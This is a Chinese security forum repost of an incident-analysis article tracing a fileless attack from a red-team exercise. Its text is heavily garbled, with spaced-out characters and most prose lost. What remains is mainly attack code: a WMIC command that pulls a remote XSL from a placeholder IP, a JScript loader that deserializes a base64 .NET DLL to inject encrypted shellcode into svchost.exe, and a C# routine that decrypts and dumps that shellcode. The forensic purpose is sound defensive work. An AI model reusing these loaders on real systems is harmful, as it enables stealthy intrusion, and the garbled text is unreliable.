设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 护网 [21882] 2021-04-18_2021攻防参考一次红蓝对抗无文件攻 ...
返回列表 发新帖
查看: 2|回复: 0

[21882] 2021-04-18_2021攻防参考一次红蓝对抗无文件攻击溯源

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 5 天前 | 显示全部楼层 |阅读模式
2021-04-18_2021攻防参考一次红蓝对抗无文件攻击溯源 2 0 2 1   |     L e m o n S e c   2 0 2 1 - 0 4 - 1 8 F i l e l e s s L i v i n g   o f f   t h e   L a n d p o w e r s h e l l m a h t a r u n d l l 3 2 . N E T   a s s e m b l y F F E 4 h t t p s : / / b l o g . c s d n . n e t / c s s x n / a r t i c l e / d e t a i l s / 8 8 9 5 6 7 3 2 0 x 0 1   x s l w m i c x s l h t t p s : / / 3 g s t u d e n t . g i t h u b . i o / 3 g s t u d e n t . g i t h u b . i o / % E 5 % 8 8 % A 9 % E 7 % 9 4 % A 8 w m i c % E 8 % B 0 % 8 3 % E 7 % 9 4 % A 8 x s l % E 6 % 9 6 % 8 7 % E 4 % B B % B 6 % E 7 % 9 A % 8 4 % E 5 % 8 8 % 8 6 % E 6 % 9 E % 9 0 % E 4 % B 8 % 8 E % E 5 % 8 8 % A 9 % E 7 % 9 4 % A 8 / 0 x 0 2   x s l X S L J a v a s c r i p t V B s c r i p t h t t p s : / / z h . w i k i p e d i a . o r g / w i k i / % E 5 % 8 F % A F % E 6 % 8 9 % A 9 % E 5 % B 1 % 9 5 % E 6 % A 0 % B 7 % E 5 % B C % 8 F % E 8 % A F % A D % E 8 % A 8 % 8 0 x s l J S j s s h e l l . n e t b a s e 6 4 P E C # D L L . N E T s h e l l . n e t d l l C # c a l l j s . n e t h t t p s : / / g i t h u b . c o m / t y r a n i d / D o t N e t T o J S c r i p t S h e l l . N E T C : / W i n d o w s / S y s W O W 6 4 / w b e m / W M I C . e x e   o s   g e t   / f o r m a t : " / / i p / s c r i p t s / 1 . x s l " f u n c t i o n   a u t o v e r s i o n ( ) { v a r   s h e l l   =   n e w   A c t i v e X O b j e c t ( ' W S c r i p t . S h e l l ' ) ;                 v e r   =   ' v 4 . 0 . 3 0 3 1 9 ' ; t r y   {                 s h e l l . R e g R e a d ( ' H K L M S O F T W A R E M i c r o s o f t . N E T F r a m e w o r k v 4 . 0 . 3 0 3 1 9 ' ) ;                 }   c a t c h ( e )   {                 v e r   =   ' v 2 . 0 . 5 0 7 2 7 ' ;                 }                 s h e l l . E n v i r o n m e n t ( ' P r o c e s s ' ) ( ' C O M P L U S _ V e r s i o n ' )   =   v e r ;
. n e t c a l l c a l l s v c h o s t . e x e b a s e 6 4 c o d e r u n s e r i a l i z e d _ o b j b a s e 6 4 d l l C h r o m e b a s e 6 4 c o p y 使 0 1 0 E d i t o r b a s e 6 4 d e c o d e                 s h e l l . E n v i r o n m e n t ( ' P r o c e s s ' ) ( ' C O M P L U S _ V e r s i o n ' )   =   v e r ;         } f u n c t i o n   r u n ( ) {                 v a r   s e r i a l i z e d _ o b j   =   ' b a s e 6 4 C #   D L L ' ;                 v a r   c r y p t e d c o d e   =   ' B a s e 6 4 s h e l l c o d e ' ;                 v a r   e n t r y _ c l a s s   =   ' t e s t ' ;                   t r y                 {                         a u t o v e r s i o n ( ) ;                         v a r   s t m   =   b a s e 6 4 T o S t r e a m ( s e r i a l i z e d _ o b j ) ;                         v a r   f m t   =   n e w   A c t i v e X O b j e c t ( ' S y s t e m . R u n t i m e . S e r i a l i z a t i o n . F o r m a t t e r s . B i n a r y . B i n a r y F o r m a t t e r ' ) ;                         v a r   a l   =   n e w   A c t i v e X O b j e c t ( ' S y s t e m . C o l l e c t i o n s . A r r a y L i s t ' ) ;                         v a r   d   =   f m t . D e s e r i a l i z e _ 2 ( s t m ) ;                         a l . A d d ( f m t . S u r r o g a t e S e l e c t o r ) ;                         v a r   o   =   d . D y n a m i c I n v o k e ( a l . T o A r r a y ( ) ) . C r e a t e I n s t a n c e ( e n t r y _ c l a s s ) ;                         o . c a l l ( ' s v c h o s t . e x e ' ,   c r y p t e d c o d e ) ;                 }                 c a t c h   ( e )                 {                 }                   r e t u r n   0 ;         }
b a s e 6 4 h e x M Z M Z D L L . n e t 2 . 0 d l l
0 x 0 3   C #   D L L 使 I L S p y d u m p C #   D L L t e s t c a l l c a l l s v c h o s t b a s e 6 4 C a l l   D E S E n c r y p t . D e c r y p t ( b 6 4 c o d e ,   t e s t . k e y ) ; b a s e 6 4 使 D E S K E Y * * * A T e a m   s h e l l c o d e C o d e L o a d e r . C r e a t e P r o c e s s W i t h C o d e ( p a t h ,   c o d e ) ;   C r e a t e P r o c e s s W i t h C o d e s h e l l c o d e h t t p s : / / w w w . 4 h o u . c o m / t e c h n o l o g y / 8 8 6 9 . h t m l
0 x 0 4   s h e l l c o d e C # s h e l l c o d e   d u m p u s i n g   S y s t e m ; u s i n g   S y s t e m . C o l l e c t i o n s . G e n e r i c ; u s i n g   S y s t e m . I O ; u s i n g   S y s t e m . L i n q ; u s i n g   S y s t e m . S e c u r i t y . C r y p t o g r a p h y ; u s i n g   S y s t e m . T e x t ; u s i n g   S y s t e m . T h r e a d i n g . T a s k s ;   n a m e s p a c e   t e s t {         c l a s s   P r o g r a m         {                 s t a t i c   s t r i n g   k e y   =   " x x x " ;                 s t a t i c   s t r i n g   c r y p t e d c o d e   =   " b a s e 6 4 - > d e s s h e l l c o d e " ;                   p u b l i c   s t a t i c   b y t e [ ]   D e c r y p t ( s t r i n g   p T o D e c r y p t ,   s t r i n g   s K e y )                 {                         D E S C r y p t o S e r v i c e P r o v i d e r   d E S C r y p t o S e r v i c e P r o v i d e r   =   n e w   D E S C r y p t o S e r v i c e P r o v i d e r ( ) ;                         b y t e [ ]   a r r a y   =   C o n v e r t . F r o m B a s e 6 4 S t r i n g ( p T o D e c r y p t ) ;                         d E S C r y p t o S e r v i c e P r o v i d e r . K e y   =   E n c o d i n g . A S C I I . G e t B y t e s ( s K e y ) ;                         d E S C r y p t o S e r v i c e P r o v i d e r . I V   =   E n c o d i n g . A S C I I . G e t B y t e s ( s K e y ) ;                         M e m o r y S t r e a m   m e m o r y S t r e a m   =   n e w   M e m o r y S t r e a m ( ) ;                         C r y p t o S t r e a m   c r y p t o S t r e a m   =   n e w   C r y p t o S t r e a m ( m e m o r y S t r e a m ,   d E S C r y p t o S e r v i c e P r o v i d e r . C r e a t e D e c r y p t o r ( ) ,   C r y p t o S t r e a m M o d e . W r i t e ) ;                         c r y p t o S t r e a m . W r i t e ( a r r a y ,   0 ,   a r r a y . L e n g t h ) ;                         c r y p t o S t r e a m . F l u s h F i n a l B l o c k ( ) ;                         r e t u r n   m e m o r y S t r e a m . T o A r r a y ( ) ;                 }                   s t a t i c   v o i d   M a i n ( s t r i n g [ ]   a r g s )                 {                         b y t e [ ]   c o d e   =     D e c r y p t ( c r y p t e d c o d e ,   k e y ) ;                       s t r i n g   f i l e P a t h   =   D i r e c t o r y . G e t C u r r e n t D i r e c t o r y ( )   +   " 1 2 3 . t x t " ;                       i f   ( F i l e . E x i s t s ( f i l e P a t h ) )                               F i l e . D e l e t e ( f i l e P a t h ) ;
s h e l l c o d e l o a d e r C 2 I P 访 访 使 L e m o n S e c                         F i l e S t r e a m   f s   =   n e w   F i l e S t r e a m ( f i l e P a t h ,   F i l e M o d e . C r e a t e ) ;                       f s . W r i t e ( c o d e ,   0 ,   c o d e . L e n g t h ) ;                       f s . F l u s h ( ) ;                       f s . C l o s e ( ) ;                                                   i n t   n   =   1 2 3 ;                 }         } }
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:38 , Processed in 0.378651 second(s), 30 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表